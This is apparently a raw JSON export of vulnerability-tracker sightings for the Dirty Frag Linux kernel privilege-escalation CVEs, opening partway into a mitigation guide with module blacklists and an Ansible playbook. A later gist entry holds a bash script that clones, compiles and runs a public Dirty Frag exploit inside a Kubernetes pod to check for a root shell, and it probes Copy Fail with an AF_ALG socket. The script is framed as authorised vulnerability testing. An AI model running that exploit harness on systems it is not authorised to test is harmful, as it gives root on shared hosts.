RxRPC.\n\nLikely unaffected:\n\n- HTTPS/TLS\n- SSH\n- Docker bridge networking\n- WireGuard\n- Tailscale\n- OpenVPN\n- normal web apps and APIs\n\nLikely affected:\n\n- strongSwan/libreswan IPsec tunnels using ESP\n- software depending on RxRPC or AFS\n\nCheck before applying on VPN gateways:\n\n```bash\nip xfrm state\nsystemctl list-units --type=service --all 'strongswan*' 'ipsec*' 'libreswan*' 'openafs*' 'afsd*'\nps -eo comm,args | grep -E 'strongswan|charon|pluto|ipsec|openafs|afsd|rxrpc' | grep -v grep || true\n```\n\n## Quick check\n\n```bash\nuname -r\ngrep -E '^(esp4|esp6|rxrpc) ' /proc/modules || echo \"esp4, esp6, rxrpc are not currently loaded\"\nmodprobe -n -v esp4 2>/dev/null || true\nmodprobe -n -v esp6 2>/dev/null || true\nmodprobe -n -v rxrpc 2>/dev/null || true\n```\n\nIf one of these features is built directly into your kernel instead of available as a module, a modprobe blacklist cannot disable it. In that case, prioritize a fixed kernel and reboot.\n\n## Manual mitigation\n\n```bash\nsudo tee /etc/modprobe.d/disable-dirtyfrag.conf >/dev/null <<'EOF'\ninstall esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\nEOF\n\nsudo modprobe -r esp4 esp6 rxrpc 2>/dev/null || true\nsync\necho 3 | sudo tee /proc/sys/vm/drop_caches >/dev/null\n```\n\nVerify:\n\n```bash\nif grep -E '^(esp4|esp6|rxrpc) ' /proc/modules; then\n  echo \"STILL LOADED: reboot or investigate module users\"\nelse\n  echo \"Dirty Frag modules are not loaded\"\nfi\n\nfor module in esp4 esp6 rxrpc; do\n  echo \"== $module ==\"\n  modprobe -n -v \"$module\" 2>/dev/null || true\ndone\n```\n\nExpected `modprobe -n -v` output should include:\n\n```text\ninstall /bin/false\n```\n\n## Patch when your distro ships a kernel fix\n\nKeep normal security updates moving. The module block is a mitigation, not the final repair.\n\n```bash\nsudo apt update\nsudo apt full-upgrade\nsudo reboot\n```\n\nAfter reboot:\n\n```bash\nuname -r\ngrep -E '^(esp4|esp6|rxrpc) ' /proc/modules || true\n```\n\n## Ansible playbook\n\nSave as `dirtyfrag-mitigate.yml`:\n\n```yaml\n---\n- name: Mitigate Dirty Frag CVE-2026-43284 and CVE-2026-43500\n  hosts: all\n  become: true\n  gather_facts: false\n\n  vars:\n    dirtyfrag_modules:\n      - esp4\n      - esp6\n      - rxrpc\n\n  tasks:\n    - name: Check active IPsec xfrm state\n      ansible.builtin.command: ip xfrm state\n      register: dirtyfrag_xfrm_state\n      changed_when: false\n      failed_when: false\n\n    - name: Show active IPsec xfrm state warning\n      ansible.builtin.debug:\n        msg: \"Active xfrm state detected. Confirm this host is not an IPsec gateway before disabling esp4/esp6.\"\n      when: dirtyfrag_xfrm_state.stdout | trim | length > 0\n\n    - name: Block Dirty Frag kernel modules from loading\n      ansible.builtin.copy:\n        dest: /etc/modprobe.d/disable-dirtyfrag.conf\n        owner: root\n        group: root\n        mode: \"0644\"\n        content: |\n          {% for module in dirtyfrag_modules %}\n          install {{ module }} /bin/false\n          {% endfor %}\n      register: dirtyfrag_blacklist\n\n    - name: Unload Dirty Frag modules if currently loaded\n      community.general.modprobe:\n        name: \"{{ item }}\"\n        state: absent\n      loop: \"{{ dirtyfrag_modules }}\"\n      register: dirtyfrag_unload\n      failed_when: false\n\n    - name: Flush filesystem buffers before clearing page cache\n      ansible.builtin.command: sync\n      changed_when: false\n      when: dirtyfrag_blacklist.changed or dirtyfrag_unload.changed\n\n    - name: Clear page cache after mitigation changes\n      ansible.builtin.command: sysctl -w vm.drop_caches=3\n      changed_when: true\n      when: dirtyfrag_blacklist.changed or dirtyfrag_unload.changed\n\n    - name: Check whether Dirty Frag modules are still loaded\n      ansible.builtin.shell: \"grep -E '^(esp4|esp6|rxrpc) ' /proc/modules\"\n      register: dirtyfrag_loaded\n      changed_when: false\n      failed_when: false\n\n    - name: Verify modprobe resolves modules to /bin/false\n      ansible.builtin.command: \"modprobe -n -v {{ item }}\"\n      loop: \"{{ dirtyfrag_modules }}\"\n      register: dirtyfrag_modprobe_check\n      changed_when: false\n      failed_when: false\n\n    - name: Show mitigation status\n      ansible.builtin.debug:\n        msg:\n          - \"config_changed={{ dirtyfrag_blacklist.changed }}\"\n          - \"loaded_modules={{ dirtyfrag_loaded.stdout | default('') }}\"\n          - \"modprobe_checks={{ dirtyfrag_modprobe_check.results | map(attribute='stdout') | list }}\"\n\n    - name: Fail if Dirty Frag modules are still loaded\n      ansible.builtin.fail:\n        msg: \"One or more Dirty Frag modules are still loaded. Reboot this host or inspect module users.\"\n      when: dirtyfrag_loaded.rc == 0\n```\n\nExample `inventory.yml`:\n\n```yaml\n---\nall:\n  children:\n    webservers:\n      hosts:\n        web-1:\n          ansible_host: 203.0.113.10\n          ansible_user: ubuntu\n        web-2:\n          ansible_host: 203.0.113.11\n          ansible_user: ubuntu\n    workers:\n      hosts:\n        worker-1:\n          ansible_host: 203.0.113.20\n          ansible_user: debian\n  vars:\n    ansible_become: true\n    ansible_python_interpreter: /usr/bin/python3\n```\n\nRun it:\n\n```bash\nansible-playbook -i inventory.yml dirtyfrag-mitigate.yml\n```\n\nRun only a selected group:\n\n```bash\nansible-playbook -i inventory.yml dirtyfrag-mitigate.yml --limit webservers\n```\n\n## Ansible role-style task\n\nIf you already have a common hardening role, put the modules in group vars:\n\n```yaml\ndisabled_kernel_modules:\n  - esp4\n  - esp6\n  - rxrpc\n```\n\nThen use this task block:\n\n```yaml\n- name: Block disabled kernel modules from loading\n  ansible.builtin.copy:\n    dest: \"/etc/modprobe.d/disable-{{ item }}.conf\"\n    owner: root\n    group: root\n    mode: \"0644\"\n    content: |\n      install {{ item }} /bin/false\n  loop: \"{{ disabled_kernel_modules | default([]) }}\"\n  register: disabled_kernel_module_blacklists\n\n- name: Unload disabled kernel modules if currently loaded\n  community.general.modprobe:\n    name: \"{{ item }}\"\n    state: absent\n  loop: \"{{ disabled_kernel_modules | default([]) }}\"\n  register: disabled_kernel_module_unloads\n  failed_when: false\n\n- name: Flush filesystem buffers before clearing page cache\n  ansible.builtin.command: sync\n  changed_when: false\n  when: disabled_kernel_module_blacklists.changed or disabled_kernel_module_unloads.changed\n\n- name: Clear page cache after Dirty Frag mitigation changes\n  ansible.builtin.command: sysctl -w vm.drop_caches=3\n  changed_when: true\n  when: disabled_kernel_module_blacklists.changed or disabled_kernel_module_unloads.changed\n```\n\n## Remove the manual mitigation later\n\nOnly do this after your running kernel is fixed and you have rebooted into it.\n\n```bash\nsudo rm /etc/modprobe.d/disable-dirtyfrag.conf\nsudo reboot\n```\n", "creation_timestamp": "2026-05-08T16:19:20.000000Z"}, {"uuid": "f1fdef27-cd15-43f3-8623-e037b98ccf21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/aaronngray.bsky.social/post/3mlepvoqhu22t", "content": "CVE-2026-43284 - Dirty Frag Linux kernel local privilege escalation vulnerability mitigation\n\nsudo ipsec down \nsudo ipsec status", "creation_timestamp": "2026-05-08T21:56:16.914396Z"}, {"uuid": "15503729-c209-4467-a652-16df736e948f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/aaronngray.bsky.social/post/3mlepyf5dgs2t", "content": "CVE-2026-43284 - Dirty Frag Linux kernel local privilege escalation vulnerability mitigation\n\nOn Ubuntu and Debian its normally disabled by default !\n\n> sudo ipsec status\n> sudo ipsec down ", "creation_timestamp": "2026-05-08T21:57:47.572209Z"}, {"uuid": "74ba7c0e-7d55-4134-a991-1e3268a2025f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/83407", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a DIRTYFAIL\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a KaraZajac\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-08 19:58:21\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nDetector + PoC for Linux page-cache write vulnerabilities: Copy Fail (CVE-2026-31431) and Dirty Frag (CVE-2026-43284/43500). Authorized security research only.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-08T20:00:04.000000Z"}, {"uuid": "2cee0bae-7b8d-4c1c-a272-7cd2c5c2a779", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3mleq4zjrfm2s", "content": "Two Linux kernel vulnerabilities, CVE-2026-43284 and CVE-2026-43500 (Dirty Frag), enable local users to escalate privileges by overwriting page cache across many distros. Monitoring ESP and RxRPC recommended. #LinuxKernel #RootAccess #USA", "creation_timestamp": "2026-05-08T22:00:23.279873Z"}, {"uuid": "7d3ce138-7aff-4954-916c-b96991216ac6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/dragostech.bsky.social/post/3mler7ebhyc26", "content": "\"Dirty Frag\" clickbait update: ESP (CVE-2026-43284) patched in mainline + stable (7.0.5, 6.18.28, 6.12.87, 6.6.138, 6.1.171). RxRPC (CVE-2026-43500) still unpatched upstream. AWS adds ipcomp4/ipcomp6 to the blacklist alongside esp4/esp6/rxrpc. AlmaLinux shipped both. Ubuntu/Debian mitigation only.", "creation_timestamp": "2026-05-08T22:20:51.242177Z"}, {"uuid": "101ee9dc-5975-4d6b-ad58-46457fc23e58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/hoyhoy.bsky.social/post/3mletgr2n3c26", "content": "CVE-2026-43284 on RHEL8", "creation_timestamp": "2026-05-08T22:59:36.061253Z"}, {"uuid": "482289f0-4380-436d-b233-7290315da22b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "Telegram/L06xv0vm_v9B-lUjnDANUtY1-6vQFMFDzrcYuiA5m0MAZkY", "content": "", "creation_timestamp": "2026-05-08T21:00:04.000000Z"}, {"uuid": "80a323d9-5505-4798-a643-d807307853ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/roberio-batista.bsky.social/post/3mletrfj72k23", "content": "Vulnerabilidade ID: CVE-2026-43284.\n\nOs componentes afetados s\u00e3o os m\u00f3dulos do kernel Linux. \n\nOs kerneis diretamente ligados as vers\u00f5es Debian.\n\nsecurity-tracker.debian.org/tracker/CVE-...", "creation_timestamp": "2026-05-08T23:04:43.605039Z"}, {"uuid": "f570b7b2-dcfa-4861-a9a9-06cf9daef6f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/hackernewsbot.bsky.social/post/3mlh6du5b742r", "content": "\"Dirty Frag\" (CVE-2026-43284): The Second Linux Root Exploit in Eight Days | Discussion", "creation_timestamp": "2026-05-09T21:20:03.946457Z"}, {"uuid": "d84cecf9-30ee-4a10-85df-b6bf52108f51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/0xdf.bsky.social/post/3mlhbvqwflc2b", "content": "Diving into Dirty Frag, the second Linux page-cache local privesc in two weeks. CVE-2026-43284 + CVE-2026-43500 provide full distro coverage. \n\nI walk through both variants, the broken disclosure, and demo both versions on the HTB Snapped machine.\n\nwww.youtube.com/watch?v=B5eU...", "creation_timestamp": "2026-05-09T22:23:46.733741Z"}, {"uuid": "d8fa674a-c4df-442c-b807-ef22429809fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/crustytldr.bsky.social/post/3mlfyh6uxkw22", "content": "\ud83d\udd12 Dirty Frag (CVE-2026-43284, CVE-2026-43500): Mitigation\n\nDirty Frag (CVE-2026-43284, CVE-2026-43500) is a newly disclosed Linux kernel local privilege escalation vulnerability affecting I...\n\nhttps://is.gd/AoNgC0 #CyberSecurity #InfoSec #CrustyTLDR", "creation_timestamp": "2026-05-09T10:01:53.478952Z"}, {"uuid": "3ed674ff-27ea-4791-a039-1716d81519c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mlfzer5kv232", "content": "Dirty Frag Exposes Linux Kernels to Reliable Root Takeover on Major Distributions Dirty Frag chains kernel flaws in ESP and RxRPC processing to corrupt page cache and deliver root on major Linux di...\n\n#CybersecurityUpdate #CVE-2026-43284 #Linux #kernel [\u2026] \n\n[Original post on webpronews.com]", "creation_timestamp": "2026-05-09T10:18:32.017191Z"}, {"uuid": "1ce287d7-8295-4381-97c7-a9d5300d7267", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://gist.github.com/kzzalews/dc37275ebd58c0367245260abd1b5145", "content": "#!/usr/bin/env bash\n# =============================================================================\n# DirtyFrag & Copy Fail \u2014 Empirical Exploitability Test\n# Target:  Any AKS cluster (Ubuntu 22.04, kernel 5.15.x-azure)\n# CVEs:    CVE-2026-43284 (DirtyFrag xfrm-ESP)\n#          CVE-2026-43500 (DirtyFrag RxRPC)\n#          CVE-2026-31431 (Copy Fail / algif_aead)\n# Advisory: https://github.com/Azure/AKS/issues/5753\n# Author:  Karol Zalewski / Aiko (Claude Sonnet 4.6) \u2014 2026-05-09\n#\n# USAGE:\n#   Set AZ_RG, AZ_CLUSTER, KUBE_CONTEXT below to match your cluster,\n#   then run:  ./dirtyfrag-cve-test.sh 2>&1 | tee results.txt\n#\n# WARNING: This script compiles and executes a public exploit PoC\n#   (V4bel/dirtyfrag). Run only in DEV/test environments, with\n#   explicit team approval, and only if you are authorised to do so.\n# =============================================================================\n\nset -euo pipefail\n\n# --- config \u2014 EDIT THESE -----------------------------------------------------\nAZ_RG=\"example-rg\"                      # Azure resource group of the cluster\nAZ_CLUSTER=\"example-cluster\"            # AKS cluster name\nKUBE_CONTEXT=\"example-cluster\"          # kubectl context name\nNAMESPACE=\"default\"\nTEST_NODE_POOL=\"nodepool1\"               # picks first schedulable node from this pool\nPOD_DIRTYFRAG=\"dirtyfrag-test\"\nPOD_COPYFAIL=\"copyfail-test\"\n# -----------------------------------------------------------------------------\n\nRED='\\033[0;31m'; YELLOW='\\033[1;33m'; GREEN='\\033[0;32m'; CYAN='\\033[0;36m'; NC='\\033[0m'\n\nlog()  { echo -e \"${CYAN}[$(date +%H:%M:%S)]${NC} $*\"; }\nok()   { echo -e \"${GREEN}[OK]${NC} $*\"; }\nwarn() { echo -e \"${YELLOW}[WARN]${NC} $*\"; }\nerr()  { echo -e \"${RED}[ERROR]${NC} $*\"; }\n\nconfirm() {\n  local msg=\"${1:-Continue?}\"\n  echo \"\"\n  read -r -p \"$(echo -e \"${YELLOW}>>> ${msg} [y/N] ${NC}\")\" ans\n  [[ \"${ans}\" =~ ^[Yy]$ ]] || { warn \"Skipped by user.\"; return 1; }\n}\n\n# --- cleanup -----------------------------------------------------------------\nCLEANUP_DONE=0\ncleanup() {\n  [[ ${CLEANUP_DONE} -eq 1 ]] && return\n  CLEANUP_DONE=1\n  echo \"\"\n  warn \"=== CLEANUP ===\"\n  kubectl --context \"${KUBE_CONTEXT}\" delete pod \"${POD_DIRTYFRAG}\" \"${POD_COPYFAIL}\" \\\n    --force --ignore-not-found --namespace \"${NAMESPACE}\" 2>/dev/null || true\n  ok \"Test pods removed.\"\n}\ntrap cleanup EXIT INT TERM\n\n# =============================================================================\n# STEP 0 \u2014 Fetch kubeconfig & switch context\n# =============================================================================\necho \"\"\necho -e \"${CYAN}========================================${NC}\"\necho -e \"${CYAN}  DirtyFrag / Copy Fail \u2014 CVE Test     ${NC}\"\necho -e \"${CYAN}========================================${NC}\"\necho \"\"\n\nlog \"Step 0: Fetching kubeconfig for ${AZ_CLUSTER} (RG: ${AZ_RG})\"\naz aks get-credentials \\\n  --resource-group \"${AZ_RG}\" \\\n  --name \"${AZ_CLUSTER}\" \\\n  --overwrite-existing\nok \"Kubeconfig merged.\"\n\nkubectl config use-context \"${KUBE_CONTEXT}\"\nok \"Context set to: ${KUBE_CONTEXT}\"\n\n# --- sanity check ------------------------------------------------------------\nlog \"Verifying node state...\"\nkubectl --context \"${KUBE_CONTEXT}\" get nodes \\\n  -o custom-columns=\"NAME:.metadata.name,STATUS:.status.conditions[-1].type,KERNEL:.status.nodeInfo.kernelVersion,SCHED:.spec.unschedulable\" \\\n  2>/dev/null || true\necho \"\"\n\n# Pick first schedulable node from the target pool\nTARGET_NODE=$(kubectl --context \"${KUBE_CONTEXT}\" get nodes \\\n  --no-headers \\\n  -o custom-columns=\"NAME:.metadata.name,SCHED:.spec.unschedulable\" \\\n  2>/dev/null \\\n  | awk -v pool=\"${TEST_NODE_POOL}\" '$1 ~ pool && $2 == \"\" {print $1; exit}')\n\nif [[ -z \"${TARGET_NODE}\" ]]; then\n  err \"No schedulable '${TEST_NODE_POOL}' node found. Check node status above and re-run.\"\n  exit 1\nfi\nok \"Target node: ${TARGET_NODE}\"\n\n# =============================================================================\n# STEP 1 \u2014 DirtyFrag xfrm-ESP (CVE-2026-43284) \u2014 THE KEY QUESTION\n# =============================================================================\necho \"\"\necho -e \"${CYAN}--- Step 1: DirtyFrag xfrm-ESP (CVE-2026-43284) ---${NC}\"\nwarn \"This step compiles and runs the researcher PoC (V4bel/dirtyfrag).\"\nwarn \"Expected outcomes:\"\nwarn \"  ROOT SHELL   \u2192 kernel 5.15 IS vulnerable to xfrm-ESP; AKS advisory incorrect\"\nwarn \"  EXPLOIT FAIL \u2192 kernel 5.15 is NOT vulnerable; AKS advisory correct\"\necho \"\"\n\nconfirm \"Run DirtyFrag xfrm-ESP test on ${TARGET_NODE}?\" || { warn \"Skipping Step 1.\"; goto_step2=1; }\n\nif [[ -z \"${goto_step2:-}\" ]]; then\n  log \"Spawning compiler pod (gcc:13) on ${TARGET_NODE}...\"\n  kubectl --context \"${KUBE_CONTEXT}\" run \"${POD_DIRTYFRAG}\" \\\n    --image=gcc:13 \\\n    --restart=Never \\\n    --namespace \"${NAMESPACE}\" \\\n    --overrides=\"$(printf '{\n      \"spec\": {\n        \"nodeSelector\": {\"kubernetes.io/hostname\": \"%s\"},\n        \"tolerations\": [{\"operator\": \"Exists\"}]\n      }\n    }' \"${TARGET_NODE}\")\" \\\n    -- sleep 1800\n\n  log \"Waiting for pod to be Ready (up to 120s)...\"\n  kubectl --context \"${KUBE_CONTEXT}\" wait pod/\"${POD_DIRTYFRAG}\" \\\n    --for=condition=Ready --timeout=120s --namespace \"${NAMESPACE}\"\n  ok \"Pod ready.\"\n\n  KERNEL=$(kubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_DIRTYFRAG}\" \\\n    --namespace \"${NAMESPACE}\" -- uname -r 2>/dev/null)\n  log \"Kernel on node: ${KERNEL}\"\n\n  log \"Cloning and compiling DirtyFrag PoC inside pod...\"\n  kubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_DIRTYFRAG}\" \\\n    --namespace \"${NAMESPACE}\" -- bash -c '\n      git clone https://github.com/V4bel/dirtyfrag.git /tmp/dirtyfrag 2>&1\n      cd /tmp/dirtyfrag\n      gcc -O0 -Wall -o exp exp.c -lutil 2>&1\n      echo \"[COMPILE OK] binary: /tmp/dirtyfrag/exp\"\n    '\n\n  echo \"\"\n  warn \"About to execute the exploit as UID 65534 (nobody) inside the pod.\"\n  warn \"Watch for: root shell, uid=0, or /etc/passwd modification.\"\n  warn \"If you get a root prompt inside the pod, type 'exit' to return.\"\n  confirm \"Execute ./exp inside pod?\" || { warn \"Exploit execution skipped.\"; }\n\n  echo \"\"\n  echo -e \"${RED}=== EXPLOIT OUTPUT START ===${NC}\"\n  kubectl --context \"${KUBE_CONTEXT}\" exec -it \"${POD_DIRTYFRAG}\" \\\n    --namespace \"${NAMESPACE}\" -- \\\n    bash -c 'cd /tmp/dirtyfrag && su -s /bin/bash nobody -c \"./exp\" 2>&1 || ./exp' \\\n    || true\n  echo -e \"${RED}=== EXPLOIT OUTPUT END ===${NC}\"\n  echo \"\"\n\n  log \"Step 1 cleanup: clearing page cache and unloading modules on node...\"\n  kubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_DIRTYFRAG}\" \\\n    --namespace \"${NAMESPACE}\" -- \\\n    bash -c 'echo 3 > /proc/sys/vm/drop_caches 2>/dev/null; rmmod esp4 esp6 rxrpc 2>/dev/null; echo \"cleanup done\"' \\\n    || warn \"Page cache flush may require privileged access \u2014 check node manually if exploit succeeded.\"\n\n  kubectl --context \"${KUBE_CONTEXT}\" delete pod \"${POD_DIRTYFRAG}\" \\\n    --force --ignore-not-found --namespace \"${NAMESPACE}\" 2>/dev/null || true\n  ok \"Step 1 pod removed.\"\nfi\n\n# =============================================================================\n# STEP 2 \u2014 DirtyFrag RxRPC (CVE-2026-43500) \u2014 expected FAIL on 5.15\n# =============================================================================\necho \"\"\necho -e \"${CYAN}--- Step 2: DirtyFrag RxRPC (CVE-2026-43500) ---${NC}\"\nwarn \"Expected: FAIL. Both AKS advisory and researcher agree RxRPC requires kernel >= 6.4.\"\nwarn \"This step confirms that kernel 5.15 is out-of-range for the RxRPC chain.\"\necho \"\"\n\nconfirm \"Run DirtyFrag RxRPC test (expected fail)?\" || { warn \"Skipping Step 2.\"; }\n\nif [[ \"${BASH_REMATCH[0]}\" != \"\" ]] || true; then\n  log \"Re-using same pod setup for Step 2...\"\n  kubectl --context \"${KUBE_CONTEXT}\" run \"${POD_DIRTYFRAG}\" \\\n    --image=gcc:13 \\\n    --restart=Never \\\n    --namespace \"${NAMESPACE}\" \\\n    --overrides=\"$(printf '{\n      \"spec\": {\n        \"nodeSelector\": {\"kubernetes.io/hostname\": \"%s\"},\n        \"tolerations\": [{\"operator\": \"Exists\"}]\n      }\n    }' \"${TARGET_NODE}\")\" \\\n    -- sleep 600 2>/dev/null || true\n\n  kubectl --context \"${KUBE_CONTEXT}\" wait pod/\"${POD_DIRTYFRAG}\" \\\n    --for=condition=Ready --timeout=120s --namespace \"${NAMESPACE}\" 2>/dev/null || true\n\n  log \"Checking if rxrpc module loads on 5.15...\"\n  echo -e \"${RED}=== RXRPC MODULE CHECK ===${NC}\"\n  kubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_DIRTYFRAG}\" \\\n    --namespace \"${NAMESPACE}\" -- \\\n    bash -c '\n      uname -r\n      echo \"Attempting to load rxrpc...\"\n      modprobe rxrpc 2>&1 || echo \"modprobe rxrpc: failed (expected on 5.15 if module not present)\"\n      lsmod | grep rxrpc || echo \"rxrpc: not loaded\"\n      ls /lib/modules/$(uname -r)/kernel/net/rxrpc/ 2>/dev/null || echo \"rxrpc module directory: not found (kernel too old)\"\n    ' || true\n  echo -e \"${RED}=== END ===${NC}\"\n\n  kubectl --context \"${KUBE_CONTEXT}\" delete pod \"${POD_DIRTYFRAG}\" \\\n    --force --ignore-not-found --namespace \"${NAMESPACE}\" 2>/dev/null || true\n  ok \"Step 2 done.\"\nfi\n\n# =============================================================================\n# STEP 3 \u2014 Copy Fail baseline (CVE-2026-31431)\n# =============================================================================\necho \"\"\necho -e \"${CYAN}--- Step 3: Copy Fail baseline (CVE-2026-31431) ---${NC}\"\nwarn \"Non-root pod (UID 1000). Tests whether AF_ALG socket auto-loads algif_aead.\"\nwarn \"Expected to succeed on nodes WITHOUT an algif_aead blacklist.\"\necho \"\"\n\nconfirm \"Run Copy Fail baseline test?\" || { warn \"Skipping Step 3.\"; exit 0; }\n\nlog \"Spawning non-root pod (python:3.12-slim, UID 1000)...\"\nkubectl --context \"${KUBE_CONTEXT}\" run \"${POD_COPYFAIL}\" \\\n  --image=python:3.12-slim \\\n  --restart=Never \\\n  --namespace \"${NAMESPACE}\" \\\n  --overrides=\"$(printf '{\n    \"spec\": {\n      \"securityContext\": {\"runAsNonRoot\": true, \"runAsUser\": 1000, \"runAsGroup\": 1000},\n      \"nodeSelector\": {\"kubernetes.io/hostname\": \"%s\"},\n      \"tolerations\": [{\"operator\": \"Exists\"}]\n    }\n  }' \"${TARGET_NODE}\")\" \\\n  -- sleep 600\n\nkubectl --context \"${KUBE_CONTEXT}\" wait pod/\"${POD_COPYFAIL}\" \\\n  --for=condition=Ready --timeout=120s --namespace \"${NAMESPACE}\"\nok \"Pod ready.\"\n\necho \"\"\necho -e \"${RED}=== COPY FAIL \u2014 AF_ALG SOCKET TEST ===${NC}\"\nkubectl --context \"${KUBE_CONTEXT}\" exec \"${POD_COPYFAIL}\" \\\n  --namespace \"${NAMESPACE}\" -- \\\n  python3 -c \"\nimport socket, os\nprint('Running as UID:', os.getuid())\nprint('Kernel:', open('/proc/version').read().split()[2])\ntry:\n    s = socket.socket(38, 5, 0)  # AF_ALG, SOCK_SEQPACKET\n    s.bind(('aead', 'authencesn(hmac(sha256),cbc(aes))'))\n    print('RESULT: algif_aead auto-loaded via AF_ALG socket')\n    print('VERDICT: Node IS vulnerable to Copy Fail (CVE-2026-31431)')\n    s.close()\nexcept PermissionError as e:\n    print('RESULT: AF_ALG bind blocked -', e)\n    print('VERDICT: algif_aead blacklist active OR module unavailable')\nexcept OSError as e:\n    print('RESULT: AF_ALG socket error -', e)\n    print('VERDICT: Module not loadable (kernel too old or not present)')\n\" 2>&1 || true\necho -e \"${RED}=== END ===${NC}\"\n\nkubectl --context \"${KUBE_CONTEXT}\" delete pod \"${POD_COPYFAIL}\" \\\n  --force --ignore-not-found --namespace \"${NAMESPACE}\" 2>/dev/null || true\nok \"Step 3 done.\"\n\n# =============================================================================\n# SUMMARY\n# =============================================================================\necho \"\"\necho -e \"${CYAN}========================================${NC}\"\necho -e \"${CYAN}  Test complete.                        ${NC}\"\necho -e \"${CYAN}========================================${NC}\"\necho \"\"\necho \"Key things to note:\"\necho \"  - Step 1: Did ./exp produce a root shell? (y/n + full output)\"\necho \"  - Step 2: Was rxrpc.ko present on 5.15? (expected: no)\"\necho \"  - Step 3: Did AF_ALG socket load algif_aead? (expected: yes on unmitigated node)\"\necho \"  - Node: ${TARGET_NODE} / Context: ${KUBE_CONTEXT}\"\necho \"\"\n", "creation_timestamp": "2026-05-09T10:18:18.000000Z"}, {"uuid": "dacb3996-6c2b-42ef-abef-6c01f2077dd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43284", "type": "seen", "source": "https://infosec.exchange/users/decio/statuses/116544139092238924", "content": "Tour d'horizon #DirtyFrag du jour :\nBien \u00e9videmment Microsoft a saut\u00e9 sur l'occasion avec un article sur une vuln Linux ...because M love Linux\ud83d\udc47 https://www.microsoft.com/en-us/security/blog/2026/05/08/active-attack-dirty-frag-linux-vulnerability-expands-post-compromise-risk/\nL'incontournable FAQ Tenable pour ceux comme moi qui aiment lire les CVE comme un mode d'emploi IKEA\ud83d\udc47 https://www.tenable.com/blog/dirty-frag-cve-2026-43284-cve-2026-43500-frequently-asked-questions-linux-kernel-lpe\nRed Hat a mis \u00e0 jour sa page  RHSB-2026-003 avec mitigations et v\u00e9rifs, en attendant le patch qui arrive \"bient\u00f4t\u2122\" \ud83d\udc47 https://access.redhat.com/security/vulnerabilities/RHSB-2026-003\nEt chez moi sur ma belle et ador\u00e9e Debian ? Les canaux security sont patch\u00e9s pour bullseye, bookworm et trixie. Bien jou\u00e9 !\ud83d\udc47 https://security-tracker.debian.org/tracker/CVE-2026-43284\nCela dit, effectivement avec l'IA qui acc\u00e9l\u00e8re la d\u00e9couverte + embargos qui tiennent plus = fen\u00eatre d'exposition qui va pas aller en r\u00e9tr\u00e9cissant. Les mainteneurs vont devoir trouver de nouveaux tricks. 